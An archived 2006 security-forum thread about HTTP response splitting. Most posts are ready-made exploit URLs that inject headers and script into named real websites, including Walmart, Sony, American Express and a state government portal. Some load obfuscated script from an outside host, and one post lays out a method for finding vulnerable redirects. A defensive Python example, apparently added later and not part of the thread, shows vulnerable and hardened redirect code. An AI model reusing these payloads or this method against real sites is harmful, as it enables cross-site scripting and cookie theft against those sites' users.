HTTP Response splitting
Posted by: rsnake
Date: September 25, 2006 12:44PM

Feeding directly from the redirects thread, as I find them I'll post them here, because it doesn't really make sense in the redirects thread even though that's the idea behind why you'd do this in the first place:

http://www.dataplace.org/redir.html?url=%0AContent-Type:html%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

As a side note it seems like there'd be a way to use this to steal HTTP Only cookies as well as long as the Set-Cookie directive were below the Location header.

- RSnake
Gotta love it. http://ha.ckers.org

Re: HTTP Response splitting
Posted by: rsnake
Date: September 25, 2006 12:53PM

Also pulled from Maluc's redirect list: http://www.topix.net/redir/loc=prss-myway/%0AContent-Type:html%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

- RSnake
Gotta love it. http://ha.ckers.org

Re: HTTP Response splitting
Posted by: rsnake
Date: September 25, 2006 12:56PM

Last one from Maluc's list: http://www.mass.gov/portal/url-trx.jsp?MGTitle=&url=%0AContent-Type:html%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3Ehttp://www.test.com

- RSnake
Gotta love it. http://ha.ckers.org

Re: HTTP Response splitting
Posted by: Kyran
Date: September 25, 2006 03:50PM

That last one opens as a download in Opera. Interesting.

- Kyran

Re: HTTP Response splitting
Posted by: kirke
Date: September 25, 2006 04:43PM

Opera is more strict about the RFC. Com'on, are we @ckers?
Use %0d%0a instead of %0a or %0a%0a, and test again.

Re: HTTP Response splitting
Posted by: rsnake
Date: September 25, 2006 04:49PM

Yup... it was just a proof of concept... hardly polished.

- RSnake
Gotta love it. http://ha.ckers.org

Re: HTTP Response splitting
Posted by: rsnake
Date: September 26, 2006 11:07PM

http://www.sony.com/SonySearch/ClickThrough?target=%0AContent-type:%20text/html%0A%0Ahttp://www.test.com/%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&term=blah&topicname=%2FHome&origin=www.sony.com&pagenum=1

- RSnake
Gotta love it. http://ha.ckers.org

Re: HTTP Response splitting
Posted by: rsnake
Date: September 26, 2006 11:14PM

From Maluc's list: http://www.brasilecodiesel.com.br/links/index.php?redir=le&acai3_cod=314228&url=%0AContent-Type:html%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

- RSnake
Gotta love it. http://ha.ckers.org

Re: HTTP Response splitting
Posted by: maluc
Date: September 29, 2006 04:51PM

Edit: Removed. not actual response splitting, just XSS.

-maluc

Edited 1 time(s). Last edit at 10/14/2006 11:43AM by maluc.

Re: HTTP Response splitting
Posted by: maluc
Date: October 02, 2006 10:25PM

if you didn't test them, where were they from? or a google dork?

Edit: nevermind, the link names answered that question .. and a lot don't work, although the berkeley one did ^^

-maluc

Edited 1 time(s). Last edit at 10/02/2006 10:27PM by maluc.

Re: HTTP Response splitting
Posted by: unsticky
Date: October 02, 2006 10:34PM

I'm workin' on it, I'm going through them now. And in a way, yes, a google dork. but... but... I found an exploit, and then googled for sites running the software... That makes me at least a step above a normal google dork.

Re: HTTP Response splitting
Posted by: maluc
Date: October 02, 2006 11:19PM

indeed it does, so guud job for that.. ^^

i'm assuming by the link names that dokuwiki is the culprit?

-maluc

Re: HTTP Response splitting
Posted by: rsnake
Date: October 02, 2006 11:43PM

Open source website applications strike again! Knowing what software will be vulnerable is key to finding issues. This is exactly how a full scale XSS worm could work in theory. Nice find unsticky. Even if only half of them work, that's still a huge success ratio for a single search. Imagine if it were in PHP nuke... thousands of sites would be vulnerable... maybe tens of thousands.

- RSnake
Gotta love it. http://ha.ckers.org

Re: HTTP Response splitting
Posted by: unsticky
Date: October 02, 2006 11:49PM

Yup, DokuWiki is indeed the culprit, and I already emailed the creator(s) of the software. According to google, ~13,800 sites run DokuWiki, and if the trend of 54/101 results actually being vulnerable continues, then that leaves something in the ballpark of 7300.

Edited 1 time(s). Last edit at 10/03/2006 01:43AM by unsticky.

Re: HTTP Response splitting
Posted by: maluc
Date: October 03, 2006 12:33AM

well there's no telling how many of those are duplicate domains..

but in any case, it's a lot of vulnerable sites.

-maluc

Edited 1 time(s). Last edit at 10/03/2006 01:29AM by maluc.

Re: HTTP Response splitting
Posted by: maluc
Date: October 14, 2006 02:53AM

http://yellowpages.com/sp/exittracking/?path=http://%0d%0a%0d%0a%3Chtml%3E%3Cbody%3E%3C%2Fbody%3E%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fs.js%3E%3C%2Fscript%3E%3Cscript%3Ealert(%22location.host%20is:%20%22%2Blocation.host)%3C%2Fscript%3E%3C%2Fhtml%3E

doesn't work in IE though..

-maluc

Re: HTTP Response splitting
Posted by: maluc
Date: October 14, 2006 03:14AM

http://www.switchboard.com/bin/cgiredir.dll?ID=515&URL=http://%0d%0a%0d%0a%3Cbody%3E%3Cscript%3Eeval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,32,40,39,60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,104,97,46,99,107,101,114,115,46,111,114,103,47,115,46,106,115,34,62,60,47,115,99,114,105,112,116,62,39,41));alert(%22location.host%20is:%20%22%2Blocation.host);%3C%2Fscript%3E

Also does not work in IE/opera .. is it because only firefox outputs response errors?

-maluc

Re: HTTP Response splitting
Posted by: yawnmoth
Date: October 14, 2006 10:50AM

I've never gotten HTTP Response Splitting to work in IE. I think it's because, in Firefox, the last HTTP response code takes precedence, whereas in IE, it's the first.

Edited 2 time(s). Last edit at 10/14/2006 01:55PM by yawnmoth.

Re: HTTP Response splitting
Posted by: maluc
Date: October 14, 2006 11:41AM

ya, none of these work in IE .. except for the randolph.af.mil one.. which i'll be relocating because it's not actually response splitting

just meta injection _-_

-maluc

Re: HTTP Response splitting
Posted by: nrg
Date: October 20, 2006 10:02AM

got one http://www.regnow.com/softsell/visitor.cgi?affiliate=14776&action=site&vendor=8527&ref=http://%0d%0a%0d%0a%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2Fscript%3E
other http://oceanservice.noaa.gov/cgi-bin/redir.cgi?url=%22%3E%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3C%22
even other http://www.puretna.com/redir.php?url=%0AContent-type:%20text/html%0A%0Ahttp://www.test.com/%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

these are easily found through google dork (following maluc's method and making some adjustments to it)

also ty rsnake for those 3 vectors for HTTP Response splitting.

challenge: can someone find the right vector for this page (just curious because this has a weird system)? http://www.fxpsc.co.jp/cgi-bin/redir.cgi?url=

Edited 3 time(s). Last edit at 10/20/2006 06:53PM by nrg.

Re: HTTP Response splitting
Posted by: maluc
Date: November 18, 2006 04:52PM

from broken's redirect: http://www.walmart.com/third_party_redirector.gsp?vendor=GE&service=CREDITAPP&url=http://%0d%0a%0d%0a%3Cscript%3Ealert(%22XSS%22)%3C%2Fscript%3E

-maluc

Re: HTTP Response splitting
Posted by: br0ken
Date: November 18, 2006 05:10PM

*scratches head*
I think I got some reading to do ...
I think I will start with this ha.ckers.org

btw thanks maluc for this and neoseeker.com xss.

Re: HTTP Response splitting
Posted by: maluc
Date: November 18, 2006 05:27PM

Yeah, i don't understand much about detecting response splitting myself.. i just try all the methods used in this thread so far, and see if they work.

what i'd really like to know, that someone like rsnake/unsticky might be able to explain.. are there certain clues in the responses seen by Live HTTP Headers or burp proxy as to which method will work?

for example, a response that cuts off after the first colon:
HTTP/1.x 302 Moved Temporarily
Date: Sat, 18 Nov 2006 23:14:41 GMT
Server: Apache-Coyote/1.1
Location: content-type:
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
(injection: %0AContent-type:%20text/html%0A%0Ahttp://www.test.com/%3Cscript%3Ealert(%22XSS%22)%3C/script%3E)

does that give any clues? or do you guys follow a similar spray-n-pray approach

basically just, what's your typical flowchart look like

-maluc

Re: HTTP Response splitting
Posted by: br0ken
Date: November 18, 2006 06:30PM

I am just looking thru Amit Klein's whitepaper_httpresponse.pdf.
and not really seeing any sure-fire way to spot them ??
Could be that I am sleepy tho ?

Anywho found one at aol.com

Aol.com

Redirect was found by benn_0_

./br0ken

Re: HTTP Response splitting
Posted by: rsnake
Date: November 18, 2006 06:58PM

I guess here's my methodology. It's a pain but it works.

For redirection response splitting:
1) locate a redirect on the site in question. Most big sites have them so this isn't that uncommon. I use my own custom script for locating them but I actually find them just as often by manual inspection.
2) See what kind of redirect it is by slowing it down with burp proxy with all server responses turned on (turn off the text bullet).
3) If it's a META it's not vulnerable (may be to XSS but not to response splitting). Same with JavaScript redirection. If it's 301, 302 or 304, chances are it's vulnerable.
4) Next replace the "http://www.whatever...." with "%0A%0Dhttp://www.whatever...." and hit the redirection again. If you see that it's changed the output from the %0A%0D to an actual newline/carriage return there is a very high probability that it's vulnerable.
5) Lastly try a full header injection with something like %0AContent-Type:html%0A%0A<script>alert("XSS")</script>

There may be some reasons some of the characters aren't allowed so your mileage may vary, but that's the general route I take for redirection. Cookies or other headers have their own methods. Ultimately it's just a pain, but you can short circuit the whole process by just jumping from line 2 to 5 and watching the output to see what happens.

- RSnake
Gotta love it. http://ha.ckers.org

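Added example (Python; not code from this thread or from any site named in it) of the redirect pattern rsnake's steps probe and of the raw response maluc asks about: a naive Location builder next to a hardened one, plus a small parser that reads raw bytes the way a lenient client does, so the header block ending early is visible. The sample parameter values and the host www.test.com are constructed.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample parameters (not taken from the thread). The first carries an
# encoded CR LF CR LF, the second only bare LFs, as kirke's post contrasts.
CLEAN = "http://www.test.com/path?x=1"
CRLF_INJECTED = "http://www.test.com/%0d%0a%0d%0a<b>injected body</b>"
LF_INJECTED = "http://www.test.com/%0AContent-Type:html%0A%0Ainjected"


def naive_redirect(url_param: str) -> bytes:
    """Vulnerable pattern: decode the parameter and copy it into Location as-is."""
    target = unquote(url_param)
    return (f"HTTP/1.1 302 Found\r\nLocation: {target}\r\n"
            f"Content-Length: 0\r\n\r\n").encode("latin-1")


def safe_redirect(url_param: str):
    """Hardened pattern: only a printable-ASCII absolute http(s) URL reaches the
    header. Returns None (answer 400 instead) when the value fails the check."""
    target = unquote(url_param)
    if not target.isascii() or any(ord(c) < 0x20 or ord(c) == 0x7F for c in target):
        return None  # CR, LF and other control characters are never legitimate here
    parts = urlsplit(target)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        return None  # also refuses javascript:, data: and scheme-relative values
    return (f"HTTP/1.1 302 Found\r\nLocation: {target}\r\n"
            f"Content-Length: 0\r\n\r\n").encode("ascii")


def parse_response(raw: bytes):
    """Read one raw response the way a lenient client does: the first blank line
    (CRLF CRLF or bare LF LF) ends the header block, the rest is body.
    Returns (status_line, {lowercased header name: value}, body)."""
    m = re.search(rb"\r?\n\r?\n", raw)
    head, body = (raw[:m.start()], raw[m.end():]) if m else (raw, b"")
    lines = head.decode("latin-1").splitlines()
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


if __name__ == "__main__":
    for param in (CLEAN, CRLF_INJECTED, LF_INJECTED):
        status, hdrs, body = parse_response(naive_redirect(param))
        print(param, "->", sorted(hdrs), body[:24], "| hardened:", safe_redirect(param) is not None)
```

With the naive builder, the server's own Content-Length header ends up inside the body for both injected inputs, which is the kind of clue maluc's Burp dump shows; the hardened builder refuses both before any header is written.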
Re: HTTP Response splitting
Posted by: maluc
Date: November 21, 2006 01:19AM

thanks, i never gave burp proxy a try for it.. but it's way better than trying to use Live HTTP Headers.. the latter only shows properly formatted headers rather than the raw data stream.

so for those looking to audit response splitting.. definitely use burp proxy. Live HTTP Headers is mostly useless for it :/

from rsnake's redirect list: http://wow.com/redir?src=PTL&clickedItemURN=http://%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

by the way rsnake, there's a typo in the third example of http://ha.ckers.org/response-splitting.html
the > in "body onload=%3Ealert(" is unnecessary

-maluc

Re: HTTP Response splitting
Posted by: rsnake
Date: November 21, 2006 11:54AM

Whoops! Thanks, maluc, I fixed that. As you can tell I wrote the examples out by hand. That'll teach me.

- RSnake
Gotta love it. http://ha.ckers.org

Re: HTTP Response splitting
Posted by: maluc
Date: November 27, 2006 08:29PM

heh, no prob..

from malorn's redirect disclosure:

http://www109.americanexpress.com/rightp/ads_redirect.jsp?location=http://%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

-maluc

Re: HTTP Response splitting
Posted by: maluc
Date: November 29, 2006 06:37AM

Dear CERT Webmasters,

Please try to build security in US-CERT.

Love Always,
-maluc

P.S. definitely the most ironic link name for an XSS i've seen
